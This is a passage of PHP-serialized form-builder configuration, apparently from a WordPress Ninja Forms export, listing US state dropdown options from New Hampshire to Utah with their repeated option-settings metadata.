Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:30;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:13:\"New Hampshire\";s:5:\"value\";s:2:\"NH\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:31;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:10:\"New Jersey\";s:5:\"value\";s:2:\"NJ\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:32;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:10:\"New Mexico\";s:5:\"value\";s:2:\"NM\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:33;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:8:\"New York\";s:5:\"value\";s:2:\"NY\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:34;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:14:\"North Carolina\";s:5:\"value\";s:2:\"NC\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:35;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:12:\"North Dakota\";s:5:\"value\";s:2:\"ND\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:36;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:4:\"Ohio\";s:5:\"value\";s:2:\"OH\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:37;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:8:\"Oklahoma\";s:5:\"value\";s:2:\"OK\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:38;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:6:\"Oregon\";s:5:\"value\";s:2:\"OR\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:39;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:12:\"Pennsylvania\";s:5:\"value\";s:2:\"PA\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:40;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:12:\"Rhode Island\";s:5:\"value\";s:2:\"RI\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:41;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:14:\"South Carolina\";s:5:\"value\";s:2:\"SC\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:42;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:12:\"South Dakota\";s:5:\"value\";s:2:\"SD\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:43;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:9:\"Tennessee\";s:5:\"value\";s:2:\"TN\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:44;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:5:\"Texas\";s:5:\"value\";s:2:\"TX\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:45;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:4:\"Utah\";s:5:\"value\";s:2:\"UT\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons 